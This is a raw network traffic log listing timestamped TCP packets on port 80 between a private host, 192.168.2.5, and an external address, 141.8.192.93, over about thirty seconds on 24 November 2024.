Nov 24, 2024 04:03:10.638283014 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.638401985 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.638457060 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.646675110 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.646775961 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.646823883 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.655075073 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.655132055 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.655240059 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.663436890 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.663551092 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.663609982 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.671816111 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.671894073 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.672033072 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.682758093 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.683135986 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.684310913 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.720190048 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.720256090 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.720350981 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.810973883 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.811077118 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.811146021 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.813628912 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.814605951 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.814681053 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.814716101 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.820004940 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.820091963 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.820126057 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.825445890 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.825499058 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.825512886 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.830780029 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.830884933 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.830890894 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.836157084 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.836251974 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.838912010 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.958352089 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.285563946 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.285633087 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.285726070 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.286698103 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.286835909 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.286931038 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.290503025 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.290606022 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.290662050 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.290676117 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.294301987 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.294390917 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.294446945 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.298109055 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.298257113 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.298525095 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.301935911 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.302026987 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.302129030 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.305747032 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.360003948 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.400641918 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.400660038 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.400751114 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.401664019 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.401767969 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.401832104 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.405497074 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.405555010 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.405607939 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.408421040 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.408513069 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.408591986 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.412261963 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.412343979 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.412528038 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.416060925 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.416157007 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.416208982 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.419869900 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.419975042 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.420032978 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.423645973 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.423738003 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.423794031 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.427503109 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.427663088 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.427726030 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.431319952 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.431416988 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.431468010 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.435148954 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.435205936 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.435265064 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.438921928 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.439004898 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.439080000 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.442665100 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.485100985 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.515479088 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.515507936 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.515572071 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.516535044 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.516652107 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.516738892 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.520355940 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.520428896 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.520648003 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.523274899 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.523423910 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.523478985 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.527127981 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.527223110 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.527275085 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.530889988 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.531013966 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.531089067 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:11.534682035 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:11.537026882 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:27.882445097 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:28.001955986 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:28.002033949 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:28.002429962 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:28.121843100 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.339575052 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.339637995 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.339673042 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.339694023 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.339741945 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.339757919 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.339796066 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.339829922 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.339844942 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.339859962 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.339868069 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.339878082 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.339894056 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.339900017 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.340765953 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.459302902 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.459464073 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.459629059 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.463418961 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.516422987 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.531989098 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.532100916 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.532346964 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.536137104 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.536231041 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.536294937 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.544523001 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.544711113 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.544784069 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.552851915 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.552982092 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.553036928 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.561212063 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.561335087 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.561378956 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.569602013 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.569751978 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.569796085 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.578033924 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.578146935 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.578231096 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.586332083 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.586455107 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.586630106 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.594691038 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.594801903 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.594883919 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.603069067 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.603200912 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.603307009 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.635966063 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.636027098 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.636090994 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.723994017 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.724055052 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.724164963 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.726383924 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.726490021 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.726542950 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.731163979 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.731277943 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.731334925 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.735939980 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.736104012 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.738120079 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.740740061 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.740853071 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.742109060 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.745511055 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.745614052 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.746134043 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.750315905 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.750386000 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:29.750439882 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.752012968 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:29.871480942 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.179399967 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.179934978 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.180016994 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.181446075 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.181567907 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.181617975 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.186232090 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.186341047 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.186414003 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.191040993 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.191118002 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.191170931 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.195810080 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.195944071 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.196000099 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.200596094 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.200711966 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.200756073 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.205424070 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.205540895 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.205586910 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.210205078 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.210315943 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.210357904 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.214997053 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.215112925 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.215157032 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.219804049 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.219908953 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.219952106 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.224586010 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.224677086 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.224715948 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.229368925 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.229433060 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.229480028 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.293390036 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.293404102 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.293473005 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.294781923 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.294894934 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.294938087 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.299571037 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.299678087 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.299720049 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.304362059 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.304459095 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.304503918 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.309186935 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.309278011 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.309328079 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.313941002 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.314048052 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.314096928 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.318759918 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.318861961 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.318907022 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.323534012 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.323649883 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.323697090 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.328329086 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.328440905 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.328485966 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.333132982 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.333233118 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.333298922 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.337929964 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.371032000 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.371117115 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.371133089 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.373357058 CET	80	49878	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:30.373408079 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:30.375622034 CET	49878	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:36.572319031 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:36.691814899 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:36.694489956 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:36.694489956 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:36.814227104 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.053658962 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.053682089 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.053755999 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.053776026 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.053883076 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.053901911 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.053914070 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.053925991 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.053940058 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.053953886 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.053985119 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.054023027 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.054035902 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.054126024 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.173470974 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.173512936 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.173645973 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.177608967 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.219655991 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.255039930 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.255156040 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.255203009 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.259222031 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.260770082 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.260811090 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.260874987 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.269191980 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.269331932 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.270124912 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.277597904 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.277733088 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.278147936 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.286067963 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.286143064 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.286173105 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.294368982 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.294486046 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.298146009 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.302771091 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.302879095 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.306132078 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.311193943 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.311316967 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.313193083 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.319617987 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.319726944 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.322133064 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.328030109 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.328071117 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.330161095 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.339215994 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.339345932 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.342180967 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.374753952 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.374808073 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.378259897 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.456207991 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.456324100 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.458144903 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.458734035 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.458823919 CET	80	49897	141.8.192.93	192.168.2.5
